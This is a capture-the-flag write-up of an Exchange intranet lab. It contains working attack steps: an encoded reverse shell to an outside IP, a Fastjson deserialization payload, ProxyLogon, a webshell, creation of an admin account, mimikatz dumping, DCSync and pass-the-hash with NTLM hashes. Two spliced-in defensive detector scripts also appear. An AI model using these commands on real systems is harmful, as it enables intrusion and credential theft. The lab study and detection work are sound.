It's been a while since I posted anything, so let's poke at a Yunjing (云镜) lab QwQ

Exchange

Target description:

Exchange is a medium-difficulty lab environment. Completing the challenge helps players understand the proxy forwarding, internal scanning, information gathering, privilege escalation and lateral movement techniques used in intranet penetration, deepens their understanding of the core authentication mechanisms of a domain environment, and covers some interesting technical points of domain penetration. The lab has 4 flags, spread across different hosts.

Entry point:

An nmap scan shows Huaxia ERP (华夏ERP) on port 8000. Anyone can register an account, and Fastjson gives RCE. Reference write-up:

Fastjson高版本的奇技淫巧 (tricks for newer Fastjson versions) - Bmth (bmth666.cn)

Related tools:

fnmsd/MySQL_Fake_Server: MySQL Fake Server use to help MySQL Client File Reading and JDBC Client Java Deserialize (github.com)

Just launch it as-is.

Configuration file:

{
    "config":{
        "ysoserialPath":"ysoserial-all.jar",
        "javaBinPath":"java",
        "fileOutputDir":"./fileOutput/",
        "displayFileContentOnScreen":true,
        "saveToFile":true
    },
    "fileread":{
        "win_ini":"c:\\windows\\win.ini",
        "win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
        "win":"c:\\windows\\",
        "linux_passwd":"/etc/passwd",
        "linux_hosts":"/etc/hosts",
        "index_php":"index.php",
        "ssrf":"https://www.baidu.com/",
        "__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]
    },
    "yso":{
        "Jdk7u21":["Jdk7u21","calc"],
        "CommonsCollections6":["CommonsCollections6","bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzExNy42Mi4yMDUuMTIwLzEyMzQ1IDA+JjE=}|{base64,-d}|{bash,-i}"]
    }
}

Payload:

GET /depotHead/list?search=%7b%20%22%6e%61%6d%65%22%3a%20%7b%20%22%40%74%79%70%65%22%3a%20%22%6a%61%76%61%2e%6c%61%6e%67%2e%41%75%74%6f%43%6c%6f%73%65%61%62%6c%65%22%2c%20%22%40%74%79%70%65%22%3a%20%22%63%6f%6d%2e%6d%79%73%71%6c%2e%6a%64%62%63%2e%4a%44%42%43%34%43%6f%6e%6e%65%63%74%69%6f%6e%22%2c%20%22%68%6f%73%74%54%6f%43%6f%6e%6e%65%63%74%54%6f%22%3a%20%22%31%31%37%2e%36%32%2e%32%30%35%2e%31%32%30%22%2c%20%22%70%6f%72%74%54%6f%43%6f%6e%6e%65%63%74%54%6f%22%3a%20%33%33%30%36%2c%20%22%69%6e%66%6f%22%3a%20%7b%20%22%75%73%65%72%22%3a%20%22%43%6f%6d%6d%6f%6e%73%43%6f%6c%6c%65%63%74%69%6f%6e%73%36%22%2c%20%22%70%61%73%73%77%6f%72%64%22%3a%20%22%70%61%73%73%22%2c%20%22%73%74%61%74%65%6d%65%6e%74%49%6e%74%65%72%63%65%70%74%6f%72%73%22%3a%20%22%63%6f%6d%2e%6d%79%73%71%6c%2e%6a%64%62%63%2e%69%6e%74%65%72%63%65%70%74%6f%72%73%2e%53%65%72%76%65%72%53%74%61%74%75%73%44%69%66%66%49%6e%74%65%72%63%65%70%74%6f%72%22%2c%20%22%61%75%74%6f%44%65%73%65%72%69%61%6c%69%7a%65%22%3a%20%22%74%72%75%65%22%2c%20%22%4e%55%4d%5f%48%4f%53%54%53%22%3a%20%22%31%22%20%7d%20%7d&currentPage=1&pageSize=15 HTTP/1.1
Host: 47.92.219.162:8000
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://47.92.219.162:8000/pages/bill/purchase_orders_list.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=AEF939D07CEDA9F23EE5E01B4E60592D; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1679730954; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1679731297
Connection: close
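As an added defensive example (not part of the original write-up): a small Python checker that decodes a query string like the one above and reports the Fastjson/JDBC deserialization indicators it carries, so a WAF rule or log review can catch this shape of request. The sample request is constructed from the decoded payload, with 192.0.2.10 as a placeholder for the fake MySQL server address.

```python
import re
from urllib.parse import parse_qs, quote

# Classes named in the @type keys of the request above; extend as needed.
GADGET_TYPES = {"java.lang.AutoCloseable", "com.mysql.jdbc.JDBC4Connection"}
TYPE_RE = re.compile(r'"@type"\s*:\s*"([^"]+)"')
AUTO_DESER_RE = re.compile(r'"autoDeserialize"\s*:\s*"?true"?', re.IGNORECASE)
INTERCEPTOR_RE = re.compile(r'"statementInterceptors"\s*:\s*"([^"]+)"')


def analyze_query(query_string: str) -> dict:
    """Decode each query parameter and report Fastjson indicators: @type keys
    naming known gadget classes, more than one @type in a single parameter
    (the AutoCloseable double-@type trick) and MySQL driver options that make
    the client deserialize data sent by the server."""
    report = {"types": [], "gadget_types": [], "auto_deserialize": False,
              "interceptor": None, "reasons": []}
    for name, values in parse_qs(query_string).items():
        for value in values:
            types = TYPE_RE.findall(value)
            if not types:
                continue
            report["types"] += types
            report["gadget_types"] += [t for t in types if t in GADGET_TYPES]
            if len(types) > 1:
                report["reasons"].append(f"{name}: {len(types)} @type keys")
            if AUTO_DESER_RE.search(value):
                report["auto_deserialize"] = True
                report["reasons"].append(f"{name}: autoDeserialize=true")
            match = INTERCEPTOR_RE.search(value)
            if match:
                report["interceptor"] = match.group(1)
                report["reasons"].append(f"{name}: statementInterceptors set")
    if report["gadget_types"]:
        report["reasons"].append("gadget class: " + ", ".join(report["gadget_types"]))
    report["suspicious"] = bool(report["reasons"])
    return report


# Constructed sample: the decoded request above, re-encoded as the client sends
# it. 192.0.2.10 is a placeholder for the attacker's fake MySQL server.
SAMPLE_JSON = ('{"name": {"@type": "java.lang.AutoCloseable", '
               '"@type": "com.mysql.jdbc.JDBC4Connection", '
               '"hostToConnectTo": "192.0.2.10", "portToConnectTo": 3306, '
               '"info": {"user": "CommonsCollections6", "password": "pass", '
               '"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", '
               '"autoDeserialize": "true", "NUM_HOSTS": "1"}}}')
SAMPLE_QUERY = "search=" + quote(SAMPLE_JSON) + "&currentPage=1&pageSize=15"
```

Calling analyze_query(SAMPLE_QUERY) returns every reason the request was flagged; a request without @type keys comes back with suspicious set to False.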

Finally, catch the shell spawned by the payload, run commands and grab the first flag.

Internal network scan results:

172.22.3.9:81 open
172.22.3.9:80 open
172.22.3.12:80 open
172.22.3.12:22 open
172.22.3.12:8000 open
172.22.3.2:88 open
172.22.3.26:445 open
172.22.3.9:445 open
172.22.3.2:445 open
172.22.3.26:139 open
172.22.3.2:139 open
172.22.3.9:135 open
172.22.3.9:8172 open
172.22.3.9:443 open
172.22.3.9:139 open
172.22.3.9:808 open
172.22.3.2:135 open
172.22.3.26:135 open
[*] WebTitle:http://172.22.3.12        code:200 len:19813  title:lumia
[+] NetInfo:
[*]172.22.3.26
   [->]XIAORANG-PC
   [->]172.22.3.26
[+] NetInfo:
[*]172.22.3.2
   [->]XIAORANG-WIN16
   [->]172.22.3.2
[*] 172.22.3.26          XIAORANG\XIAORANG-PC       
[+] NetInfo:
[*]172.22.3.9
   [->]XIAORANG-EXC01
   [->]172.22.3.9
[*] 172.22.3.2  (Windows Server 2016 Datacenter 14393)
[*] 172.22.3.2     [+]DC XIAORANG\XIAORANG-WIN16    Windows Server 2016 Datacenter 14393
[*] 172.22.3.9           XIAORANG\XIAORANG-EXC01    Windows Server 2016 Datacenter 14393
[*] WebTitle:http://172.22.3.12:8000   code:302 len:0      title:None 跳转url: http://172.22.3.12:8000/login.html
[*] WebTitle:http://172.22.3.12:8000/login.html code:200 len:5662   title:Lumia ERP
[*] WebTitle:http://172.22.3.9:81      code:403 len:1157   title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle:https://172.22.3.9:8172   code:404 len:0      title:None
[*] WebTitle:http://172.22.3.9         code:403 len:0      title:None
[*] WebTitle:https://172.22.3.9        code:302 len:0      title:None 跳转url: https://172.22.3.9/owa/
[*] WebTitle:https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237  title:Outlook

Then hit Exchange with exprolog (ProxyLogon):

https://github.com/herwonowr/exprolog.git

proxychains4 python3 exprolog.py -t 172.22.3.9 -e administrator@xiaorang.lab

Then, with arbitrary code execution, add a user:

proxychains4 curl --request POST --url https://172.22.3.9/owa/auth/vj5gm.aspx --header 'Content-Type: application/x-www-form-urlencoded' --data 'request=Response.Write(new ActiveXObject("WScript.Shell").exec("cmd").stdout.readall())' -k

net user test test@123 /add

net localgroup administrators test /add

Log in and grab the second flag.

After logging in, dump credentials with mimikatz:

.\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords" "exit" > 1.txt

Grant zhangtong DCSync rights:

python3 dacledit.py xiaorang.lab/XIAORANG-EXC01\$ -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -action write -rights DCSync -principal Zhangtong -target-dn 'DC=xiaorang,DC=lab' -dc-ip=172.22.3.2

Switch to that account with mimikatz pass-the-hash:

sekurlsa::pth /user:Zhangtong /domain:XIAORANG /ntlm:22c7f81993e96ac83ac2f3f1903de8b4

Run DCSync:

.\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit" > 12.txt
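Added detection example, not from the original post: the two steps above (rewriting the domain ACL to grant DCSync rights, then replicating the domain) leave Security-log events 5136 and 4662 on the domain controller. This Python audits records shaped like those events; the allow-list of accounts permitted to replicate, the domain DN and the sample records are assumptions, while the two replication-right GUIDs are the schema's well-known values.

```python
import re

# Control-access-right GUIDs a DCSync needs; they appear in the Properties
# field of event 4662 when the domain naming context is read.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
# Assumed allow-list: only the DC's machine account should replicate here.
ALLOWED_REPLICATORS = {"XIAORANG-WIN16$"}
DOMAIN_ROOT = "DC=xiaorang,DC=lab"
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def audit_events(events):
    """Walk Security-log records (dicts using the 4662/5136 field names) and
    return alerts for (a) a change to the domain root's nTSecurityDescriptor,
    which is how DCSync rights get granted, and (b) replication rights used
    by an account outside the allow-list, which is the DCSync itself."""
    alerts = []
    for ev in events:
        user = ev.get("SubjectUserName", "")
        if (ev.get("EventID") == 5136 and ev.get("ObjectDN") == DOMAIN_ROOT
                and ev.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"):
            alerts.append({"kind": "acl-change", "user": user})
        elif ev.get("EventID") == 4662:
            guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
            rights = sorted(REPLICATION_GUIDS[g] for g in guids if g in REPLICATION_GUIDS)
            if rights and user.upper() not in ALLOWED_REPLICATORS:
                alerts.append({"kind": "replication", "user": user, "rights": rights})
    return alerts


REPL = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
# Constructed records mirroring the two steps above: the EXC01 machine
# account rewrites the domain ACL, then Zhangtong replicates the domain.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "XIAORANG-EXC01$", "ObjectDN": DOMAIN_ROOT,
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 4662, "SubjectUserName": "XIAORANG-WIN16$", "Properties": REPL},
    {"EventID": 4662, "SubjectUserName": "Zhangtong", "Properties": REPL},
    {"EventID": 4624, "SubjectUserName": "Zhangtong"},
]
```

audit_events(SAMPLE_EVENTS) yields two alerts, the ACL change and Zhangtong's replication; the DC's own replication and the unrelated logon event are ignored.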

Continue with pass-the-hash:

proxychains4 psexec.py administrator@172.22.3.2 -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -codec gbk

or

proxychains4 crackmapexec smb 172.22.3.2 -u Administrator -H 7acbc09a6c0efd81bfa7d5a1d4238beb -d xiaorang.lab -x "type C:\\Users\\Administrator\\flag\\flag.txt"

That gives the fourth flag.

Log in to the mail server over SMB:

proxychains4 smbclient.py xiaorang.lab/administrator@172.22.3.26 -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -dc-ip 172.22.3.2

There is a secret.zip under Lumia's directory.

Pull the mailbox with PTH_Exchange: https://github.com/Jumbo-WJB/PTH_Exchange.git

proxychains4 python3 pthexchange.py --target https://172.22.3.9 --username "Lumia" --password "00000000000000000000000000000000:862976f8b23c13529c2fb1428e710296" --action Download

Download the mail and attachments. One email says the zip password is your phone number, and a list of phone numbers is included, so just brute-force it:

zip2john item-0-secret.zip > 1.sec
john 1.sec --format=pkzip --wordlist=1.txt

Open the docx to get the third flag.